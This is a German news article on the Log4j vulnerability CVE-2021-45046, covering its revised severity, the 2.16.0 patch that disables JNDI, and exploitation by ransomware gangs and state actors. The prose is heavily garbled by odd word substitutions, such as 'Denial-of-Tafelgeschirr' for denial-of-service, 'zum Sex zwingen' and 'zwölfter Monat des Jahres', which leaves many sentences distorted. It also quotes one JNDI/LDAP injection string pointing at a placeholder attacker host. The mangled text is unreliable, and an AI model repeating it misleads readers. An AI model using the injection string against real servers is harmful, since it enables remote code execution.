Zweite Log4j-Sicherheitslücke (CVE-2021-45046) entdeckt – Neuer Patch veröffentlicht

AKTUALISIEREN – Welcher Schweregrad von CVE-2021-45046, ursprünglich wie DoS-Programmierfehler klassifiziert, wurde inzwischen von 3,7 gen 9,0 überarbeitet, um welcher Tatsache Zeche zu tragen, dass ein Angreifer die Sicherheitsanfälligkeit zum Sex zwingen könnte, um eine speziell gestaltete Zeichenfolge zu senden, die zu “Informationslecks und Remotecodeausführung in einigen Umgebungen und lokale Codeausführung in allen Umgebungen.”

Die Apache Software Foundation (ASF) hat vereinigen neuen Im Nu pro dasjenige Log4j-Protokollierungsdienstprogramm veröffentlicht, nachdem welcher vorherige Patch pro dasjenige kürzlich veröffentlichte Log4Shell Exploit wurde wie “in bestimmten nicht standardmäßigen Konfigurationen” wie “unvollständig” eingestuft.

Die zweite Schwachstelle – verfolgt wie CVE-2021-45046 – wird im CVSS-Bewertungssystem mit 3,7 von maximal 10 bewertet und betrifft leer Versionen von Log4j von 2.0-beta9 solange bis 2.12.1 und 2.13.0 solange bis 2.15.0 die Projektbetreuer lieferten letzte Woche eine kritische Sicherheitslücke (CVE-2021-44228) zur Remotecodeausführung, die missbraucht werden könnte, um Systeme zu infiltrieren und zu übernehmen.

Welcher unvollständige Patch pro CVE-2021-44228 könnte missbraucht werden, um “bösartige Eingabedaten mit einem JNDI-Lookup-Warenmuster zu erstellen, welches zu einem Denial-of-Tafelgeschirr (DoS)-Übergriff führt”, heißt es in einem neuen Advisory von ASF. Die neueste Version von Log4j, 2.16.0 (pro Benutzer, die Java 8 oder höher benötigen), fern die Unterstützung pro dasjenige Nachschlagen von News praktisch vollwertig und deaktiviert standardmäßig JNDI, die Komponente, die dasjenige Herzstück welcher Schwachstelle ist. Benutzern, die Java 7 benötigen, wird empfohlen, gen die Log4j-Version 2.12.2 zu updaten, wenn sie verfügbar ist.

“Welcher Umgang mit CVE-2021-44228 hat gezeigt, dass dasjenige JNDI erhebliche Sicherheitsprobleme hat”, erklärte Ralph Goers von welcher ASF. “Obwohl wir dasjenige, welches uns traut ist, abgeschwächt nach sich ziehen, wäre es pro Benutzer sicherer, es standardmäßig vollwertig zu deaktivieren, zumal die große Mehrheit es wahrscheinlich nicht verwenden wird.”

JNDI, von kurzer Dauer pro Java Naming and Directory Interface, ist eine Java-API, die es in welcher Programmiersprache codierten Anwendungen ermöglicht, Datenansammlung und Ressourcen wie LDAP-Server nachzuschlagen. Log4Shell ist in welcher Log4j-Bibliothek resident, einem Open-Source-Java-basierten Protokollierungs-Framework, dasjenige mehrfach in Apache-Webserver integriert ist.

Dasjenige Problem selbst tritt gen, wenn die JNDI-Komponente des LDAP-Connectors genutzt wird, um eine bösartige LDAP-Frage einzuschleusen – etwa „${jndi:ldap://attacker_controled_website/payload_to_be_executed}“ – die unter Einschreibung gen einem Webserver mit welcher anfälligen Version welcher Bibliothek, ermöglicht es einem Angreifer, eine Nutzlast von einer entfernten Fach abzurufen und lokal auszuführen.

Dasjenige neueste Update kommt, da die Nachgehen des Fehlers zu einer „echten Cyber-Weltweite Seuche“ geführt nach sich ziehen, womit mehrere Bedrohungsakteure Log4Shell gen eine Weise attackieren, die die Grundlage pro weitere Angriffe legt, einschließlich des Einsatzes von Münzminenern, Fernzugriffstrojanern und Ransomware gen anfällige Maschinen. Die opportunistischen Einbrüche sollen mindestens seitdem dem 1. zwölfter Monat des Jahres begonnen nach sich ziehen, obwohl welcher Fehler am 9. zwölfter Monat des Jahres weit verbreitet wurde.

Die Sicherheitslücke hat weit verbreitete Unausgeglichenheit ausgelöst, da sie in einem nahezu allgegenwärtigen Protokollierungs-Framework in Java-Anwendungen existiert und Angreifern ein beispielloses Treffer bietet, um Mio. von Geräten gen welcher ganzen Welt zu penetrieren und zu kompromittieren.

Welcher aus welcher Ferne ausnutzbare Fehler bedeutet weitere Probleme pro Unternehmen und betrifft ebenfalls Hunderte von großen Unternehmensprodukten einer Warteschlange von Unternehmen wie Akamai, Amazon, Apache, Apereo, Atlassian, Broadcom, Cisco, Cloudera, ConnectWise, Debian, Docker, Fortinet, Google, IBM, Intel, Machandel Networks, Microsoft, Okta, Oracle, Red Hat, SolarWinds, SonicWall, Splunk, Ubuntu, VMware, Zscaler und Zoho, die ein erhebliches Risiko pro die Software-Supply Chain darstellen.

„Im Kontrast zu anderen großen Cyberangriffen, unter denen eine oder eine begrenzte Quantität von Software beteiligt ist, ist Log4j im Grunde in jedes Java-basierte Produkt oder jeden Webservice eingebettet. Es ist sehr schwierig, es manuell zu beheben“, sagte dasjenige israelische Sicherheitsunternehmen Check Point. “Jene Schwachstelle scheint uns aufgrund welcher Vielschichtigkeit des Patchens und welcher Leichtigkeit welcher Verwendung noch viele Jahre erhalten zu bleiben, es sei denn, Unternehmen und Dienste ergreifen sofort Maßnahmen, um die Angriffe gen ihre Produkte durch die Implementierung eines Schutzes zu verhindern.”

In den Tagen nachdem welcher Veröffentlichung des Fehlers sind mindestens zehn verschiedene Gruppen gen den Exploit-Zug aufgesprungen und rund 44 % welcher Unternehmensnetzwerke weltweit wurden schon angegriffen, welches eine erhebliche Eskalation darstellt. Darüber hinaus nach sich ziehen kriminelle Banden, die wie Zugangsvermittler fungieren, damit begonnen, die Schwachstelle zu nutzen, um in Zielnetzwerken Quadratlatsche zu fassen und den Zugang dann an Ransomware-as-a-Tafelgeschirr (RaaS)-Partner zu verkaufen.

Dies umfasst ebenfalls nationalstaatliche Akteure aus Volksrepublik China, dem Persien, Nordkorea und welcher Türkei, womit Microsoft anmerkt, dass die „Aktivitäten von Experimenten während welcher Weiterentwicklung, Integration welcher Schwachstelle solange bis hin zur Verfügbarmachung von Nutzlasten in freier Wildbahn und Ausbeutung gegen Ziele reichen die Ziele des Schauspielers zu gelingen.”

Die weit angelegte Waffenisierung des Fehlers unter welcher Remote-Codeausführung hat die US-amerikanische Cybersecurity and Infrastructure Security Agency (CISA) dazu veranlasst, Log4Shell in ihren Katalog bekannter ausgenutzter Schwachstellen aufzunehmen um „mit Log4j betroffene Produkte sofort zu identifizieren, abzuschwächen und zu patchen“.

Sean Gallagher, Senior Threat Researcher unter Sophos, warnte davor, dass “Gegner wahrscheinlich so viel Zugriff gen was auch immer nach sich ziehen, welches sie ohne Rest durch zwei teilbar bekommen können, um später Geld daraus zu zeugen und/oder daraus Kapital zu verkloppen”, und fügte hinzu: “Es gibt eine Pause vor welcher Sturm in Bezug gen weitere schändliche Aktivitäten durch die Log4Shell-Sicherheitslücke.”

„Die unmittelbarste Priorität pro Verteidiger besteht darin, die Gefährdung durch Patchen und Lindern aller Ecken ihrer Unterbau zu reduzieren und exponierte und potenziell kompromittierte Systeme zu untersuchen. Jene Schwachstelle kann überall sein“, fügte Gallagher hinzu.